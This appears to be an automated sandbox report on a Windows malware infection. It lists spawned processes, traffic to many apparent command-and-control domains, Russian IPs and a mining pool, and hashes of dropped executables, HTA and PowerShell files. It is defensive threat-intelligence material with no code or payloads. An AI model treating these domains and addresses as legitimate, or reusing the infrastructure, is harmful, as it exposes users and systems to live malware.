"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 6740 -ip 6740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 772

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 172.67.189.66:443 moderzysics.top tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
NL 45.144.212.77:16000 45.144.212.77 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
LU 45.59.120.8:80 45.59.120.8 tcp
NL 45.154.98.175:6969 N/A tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.80.1:443 exarthynature.run tcp
US 104.21.80.1:443 exarthynature.run tcp
US 104.21.80.1:443 exarthynature.run tcp
US 104.21.80.1:443 exarthynature.run tcp
US 104.21.80.1:443 exarthynature.run tcp
US 104.21.80.1:443 exarthynature.run tcp
US 104.21.80.1:443 exarthynature.run tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 80.240.16.67:443 pool.hashvault.pro tcp
NL 185.156.73.73:80 185.156.73.73 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 8.8.8.8:53 croprojegies.run udp
US 104.21.112.1:443 croprojegies.run tcp
US 104.21.112.1:443 croprojegies.run tcp
US 104.21.112.1:443 croprojegies.run tcp
US 104.21.112.1:443 croprojegies.run tcp
US 104.21.112.1:443 croprojegies.run tcp
US 104.21.112.1:443 croprojegies.run tcp
US 104.21.112.1:443 croprojegies.run tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 45.93.20.28:80 45.93.20.28 tcp
N/A 127.0.0.1:64028 N/A tcp
N/A 127.0.0.1:64039 N/A tcp
US 8.8.8.8:53 youtube.com udp
GB 142.250.187.206:443 youtube.com tcp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 34.117.188.166:443 spocs.getpocket.com udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 34.117.188.166:443 prod.ads.prod.webservices.mozgcp.net tcp
GB 142.250.187.206:443 youtube.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 www.youtube.com udp
GB 142.250.187.206:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 142.250.187.206:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
GB 216.58.204.68:443 www.google.com udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 150.171.27.10:443 g.bing.com tcp
US 150.171.27.10:443 g.bing.com tcp
US 150.171.27.10:443 g.bing.com tcp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 joyfulhezart.tech udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 104.21.69.194:443 codxefusion.top tcp
NL 45.144.212.77:16000 45.144.212.77 tcp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 104.21.69.194:443 codxefusion.top tcp
US 8.8.8.8:53 www.dropbox.com udp
GB 162.125.64.18:443 www.dropbox.com tcp
US 8.8.8.8:53 biochextryhub.bet udp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 towerbingobongoboom.com udp
US 213.209.150.137:4000 towerbingobongoboom.com tcp
US 213.209.150.137:4266 towerbingobongoboom.com tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 location.services.mozilla.com udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 35.190.72.216:443 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
NL 2.18.121.79:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
GB 172.217.16.238:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 172.217.16.238:443 redirector.gvt1.com udp
US 8.8.8.8:53 r2---sn-aigl6ns6.gvt1.com udp
US 8.8.8.8:53 r2.sn-aigl6ns6.gvt1.com udp
GB 74.125.105.7:443 r2.sn-aigl6ns6.gvt1.com tcp
US 8.8.8.8:53 r2.sn-aigl6ns6.gvt1.com udp
GB 74.125.105.7:443 r2.sn-aigl6ns6.gvt1.com udp
US 172.67.189.66:443 moderzysics.top tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com udp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
DE 5.75.210.149:443 N/A tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

memory/3616-0-0x0000000000D50000-0x0000000001077000-memory.dmp

memory/3616-1-0x0000000077394000-0x0000000077396000-memory.dmp

memory/3616-2-0x0000000000D51000-0x0000000000DB1000-memory.dmp

memory/3616-3-0x0000000000D50000-0x0000000001077000-memory.dmp

memory/3616-4-0x0000000000D50000-0x0000000001077000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe

MD5 b5db83c03a37b4cd4746a6080133e338
SHA1 edf3f7e5c3bda89e1382df8f7d0443783426c834
SHA256 8bf5d7ea5c499425488b94f13497a5c3b02997f00ec88fad1b577736fab245df
SHA512 e99da7c87f01dc7459b57d0ce3df799aeb22738840f047c56fb319dc8edddc00ae303ca02916b4b09690df3ff14d559fac44b3e627c6b24498338cfa290fc313

memory/3616-8-0x0000000000D51000-0x0000000000DB1000-memory.dmp

memory/228-12-0x00000000000D0000-0x000000000058F000-memory.dmp

memory/3616-10-0x0000000000D50000-0x0000000001077000-memory.dmp

memory/228-14-0x00000000000D0000-0x000000000058F000-memory.dmp

memory/228-13-0x00000000000D1000-0x00000000000FF000-memory.dmp

memory/228-16-0x00000000000D0000-0x000000000058F000-memory.dmp

memory/228-28-0x00000000000D0000-0x000000000058F000-memory.dmp

memory/2816-29-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/2816-30-0x00000000008C1000-0x00000000008EF000-memory.dmp

memory/2816-31-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/2816-32-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/2816-33-0x00000000008C0000-0x0000000000D7F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

MD5 5b3ed060facb9d57d8d0539084686870
SHA1 9cae8c44e44605d02902c29519ea4700b4906c76
SHA256 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
SHA512 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

C:\Users\Admin\AppData\Local\Temp\6C1.tmp\6C2.tmp\6C3.bat

MD5 3895cb9413357f87a88c047ae0d0bd40
SHA1 227404dd0f7d7d3ea9601eecd705effe052a6c91
SHA256 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785
SHA512 a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zmy4emts.2ob.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4960-56-0x000002AB7D7C0000-0x000002AB7D7E2000-memory.dmp

memory/2816-60-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/2816-61-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/2816-62-0x00000000008C0000-0x0000000000D7F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

MD5 73636685f823d103c54b30bc457c7f0d
SHA1 597dba03dce00cf6d30b082c80c8f9108ae90ccf
SHA256 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c
SHA512 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7

C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

MD5 47177b7fbf1ce282fb87da80fd264b3f
SHA1 d07d2f9624404fa882eb94ee108f222d76bbbd4c
SHA256 e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb
SHA512 059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9

memory/3296-106-0x0000000000B20000-0x0000000000B30000-memory.dmp

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

MD5 1dc908064451d5d79018241cea28bc2f
SHA1 f0d9a7d23603e9dd3974ab15400f5ad3938d657a
SHA256 d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454
SHA512 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f

memory/1812-121-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe

MD5 83cd4a3ac24bea5dd2388d852288c7de
SHA1 059245d06571b62c82b059a16b046793f6753dbc
SHA256 a8bc81ff72efd02a4edf01f87d1f108886d80a2484a91e776a4e947b3f47bad1
SHA512 5133d4638db05e87daaba1b5725ddaaddb434440e31a2241732dfcc21d3f8c03212f715171d990f0fd601eb926a8a0308b93f5d8139c697399a06e891725c31c

C:\Users\Admin\AppData\Local\Temp\kxJOvNhGM.hta

MD5 1133b5f5232e72f319e81f423d83c8c7
SHA1 3a0b2f7db1c949b60db7ce87e161425a4f75b4ed
SHA256 34cba07197922655997ab29f2bbdd11b05fdf8e917342c39a9c0844907b11a5a
SHA512 5a9a5a30503e2600d9dcb07e93de3ea166d4b10967d6fed777b8d31e4ce777e6d903443f4a8ca70d6f67d0d1e9db81e949a26e87be606a0fee6d2d72e8fa59ba

memory/2132-147-0x0000000004510000-0x0000000004546000-memory.dmp

memory/2132-148-0x0000000004D20000-0x0000000005348000-memory.dmp

memory/2132-149-0x0000000004C20000-0x0000000004C42000-memory.dmp

memory/2132-150-0x0000000005400000-0x0000000005466000-memory.dmp

memory/2132-151-0x0000000005470000-0x00000000054D6000-memory.dmp

memory/2132-157-0x00000000054E0000-0x0000000005834000-memory.dmp

memory/2816-162-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/2132-163-0x0000000005AD0000-0x0000000005AEE000-memory.dmp

memory/2132-164-0x0000000005AF0000-0x0000000005B3C000-memory.dmp

memory/2132-165-0x00000000071F0000-0x000000000786A000-memory.dmp

memory/2132-166-0x0000000005FF0000-0x000000000600A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd

MD5 cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1 b0db8b540841091f32a91fd8b7abcd81d9632802
SHA256 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512 ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 70595b5937369a2592a524db67e208d3
SHA1 d989b934d9388104189f365694e794835aa6f52f
SHA256 be09b93a020e2e86a0b3c7c3f3d3e2c45f888944b1036df738385ede16f595c8
SHA512 edb412886187a2740eb7e284b16838bdd9f011aba1f4581f1fed25a86cdfe9b2ab4df863edeb3db6b072805439d57b10f3e0a1f2daabe1ee56db275ad2ad61e5

C:\Users\Admin\AppData\Local\Temp\installer.ps1

MD5 b6d611af4bea8eaaa639bbf024eb0e2d
SHA1 0b1205546fd80407d85c9bfbed5ff69d00645744
SHA256 8cd3bf95cedcf3469d0044976c66cbf22cd2fecf21ae4f94986d7211d6ba9a2b
SHA512 d8a4ec5bd986884959db3edfd48e2bf4c70ead436f81eab73b104aa0ff0f5dadfb6227cb2dab1f979f0dbb3aafbc1889ed571fb6e9444a09ae984b789314463d

\??\c:\Users\Admin\AppData\Local\Temp\5wlhjbmh\5wlhjbmh.cmdline

MD5 8b2f8b71178a4e99b5358e9e6ad2db5b
SHA1 26556abb464e42523c3f166ac55e5b74255b13ed
SHA256 90a396dab7e88da62546d17430e1915c06a631edc5ea965bc4e4c417ad31f8aa
SHA512 6512ef322237053ea3d69283fb3706fd4eebb0dd6b2015ed4cda5993ea34ec1b423e1503bdb08b560e5a1636926360cf6424d3a39ddeb5968d5299dfbaf3c16d

\??\c:\Users\Admin\AppData\Local\Temp\5wlhjbmh\5wlhjbmh.0.cs

MD5 1809fe3ba081f587330273428ec09c9c
SHA1 d24ea2ea868ae49f46c8a7d894b7fda255ec1cd9
SHA256 d07a0c5fdf0862325608791f92273e0fc411c294f94d757f1ff0303ba5e03457
SHA512 e662420fc93a5cefd657f7701432924e6a06482ea147ad814d5e20b16b2f3c13ed2cc6b9caf24c22b7a5b24ad0aa1d216c5804c46d2250522cfc2cadc69f9e28

\??\c:\Users\Admin\AppData\Local\Temp\5wlhjbmh\CSCA8772FE477F3431A8E4EB01FFA7070FE.TMP

MD5 948dca49ee090711abd80c3d94065e89
SHA1 7c645e1d05b9cd46138a0d1936350b5d9cefbd6c
SHA256 31cdeebecb211e84d227d802fbd73fb3fe279a385c7742c29c3f7ab5b8f7bfbb
SHA512 cf5a4a78f265945b22f4c02aedbe0af60035062b88b798deb01d58017a0ae6e179f852debff6886bd5ed72daeb3ab3cbd2be94f2f694d9e7f1bd33c299cf77c0

C:\Users\Admin\AppData\Local\Temp\RES4FE0.tmp

MD5 311e2d48c8fa9c32173bace134fef0a3
SHA1 dd1daa6f91891161dae59ad89f204cb3ca369e98
SHA256 107bfdf1ded7cb25f5c54fcdfd0473103a835a418392037b1323553701b88281
SHA512 4badf8c1ca16eaee2b4cc879fd9cc65581ea7373163f18376b7a45fab0d5c6527a9578a23eec41bab7f55afda88eacc9ffcebff60adea7710b81fc1550b14fd2

memory/3928-213-0x000001E83B880000-0x000001E83B888000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5wlhjbmh\5wlhjbmh.dll

MD5 5f2dd6543692ba0c47a5503c71f3117f
SHA1 b430927d369d1f31240db9bd8b600c6b055ea710
SHA256 172670b2c3c564f84cd63df2eac138656846c707d7c589db553cd1393aa3f230
SHA512 fa2eabd5dd2e7c20907386520fb9818ad2697c6d0421dba5ca85466db41bbe1610c9f59d5cc00fc7e4ef997ff3107652e41384cda08e1db29bf3ed3b2082371e

memory/3380-215-0x000000000D230000-0x000000000DAB3000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 6195a91754effb4df74dbc72cdf4f7a6
SHA1 aba262f5726c6d77659fe0d3195e36a85046b427
SHA256 3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5
SHA512 ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f9f0c9fa8aa6bf9f467c23d27aa9cc44
SHA1 ff5c820bef43474569629fcebccee9817eb56b67
SHA256 38990de0f663874fd9457d27473119ddec6f487a871f9b6188b46d19e67a4e95
SHA512 5be9c9258acd47ab73a20bfea9b0f68001bd5a120afe06b634094943a9e809179061d108ea8a5feeffa1929c6b2e5bcc5b941d8cc193b98e045050bacd2267bf

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 79f0758190376147ab0e2adb0f3dbeb7
SHA1 bc6a39273f747a175f2d06e5b41fc6e830a072b9
SHA256 dff076712216c78e0876383bb682955c1011d91c0bdbcfd5ca7dd2dae5340293
SHA512 18f0be0b8f6fb5ab32131e2e06799588c23e4d79473e1cc0a7a8fac46bd54214692c903c4bba7d25c111ab22980c2861c06e711272e7b80574fc208fc6589124

memory/2132-247-0x0000000006F90000-0x0000000007026000-memory.dmp

memory/2132-248-0x0000000006F20000-0x0000000006F42000-memory.dmp

memory/2132-249-0x0000000007E20000-0x00000000083C4000-memory.dmp

memory/4640-260-0x0000000000A00000-0x0000000000EBF000-memory.dmp

memory/1812-258-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1812-257-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 72a626e77455e405451d9741c79e65f4
SHA1 c55704e51c8e1d0463a27ea11d4ca31f44653f60
SHA256 8ae2ccdcf432d61857c2722f95884fb8f3a478d43af4275193f738fc73e3d6c9
SHA512 d69db24884f74d8bef21ca097ff56e2fc8d71cd3186a6d8f431aefac42a07394d68783b46bec2518db664606b3ca9663e72b97df9acbee25ca63fc324404ccbc

memory/4640-264-0x0000000000A00000-0x0000000000EBF000-memory.dmp

C:\Temp\4buU3vPam.hta

MD5 39c8cd50176057af3728802964f92d49
SHA1 68fc10a10997d7ad00142fc0de393fe3500c8017
SHA256 f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512 cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

memory/4236-271-0x0000000005DF0000-0x0000000006144000-memory.dmp

memory/4236-277-0x0000000006740000-0x000000000678C000-memory.dmp

memory/2816-278-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/448-286-0x00000000005A0000-0x0000000000A5F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe

MD5 6afaf17077308fa040a656dc9e7d15ed
SHA1 df7caf0b424dc62a60dfb64f585c111448c0c1e3
SHA256 42c07ef38b42451a7b1717dff97266f615f2e5cedab1c5c5827dbe3e6d9f69b0
SHA512 cd459aa3bc462822a61a9f3e943aef48e9e332661c562c39bd92388be1544f034afef9f5f02315b5bce5419564ed4f3fb94e76efcb4422fdd7775aeb011be986

memory/448-297-0x00000000005A0000-0x0000000000A5F000-memory.dmp

memory/1936-305-0x00000000008B0000-0x00000000012BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe

MD5 c83ea72877981be2d651f27b0b56efec
SHA1 8d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512 d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

memory/4784-323-0x0000000000320000-0x0000000000398000-memory.dmp

memory/1032-326-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1032-328-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1812-329-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2816-330-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/1936-331-0x00000000008B0000-0x00000000012BD000-memory.dmp

memory/1936-332-0x00000000008B0000-0x00000000012BD000-memory.dmp

memory/4236-333-0x0000000000400000-0x000000000042F000-memory.dmp

memory/4912-334-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

memory/4912-335-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

memory/4912-343-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

memory/4912-344-0x0000025156E00000-0x0000025156E20000-memory.dmp

memory/4912-349-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

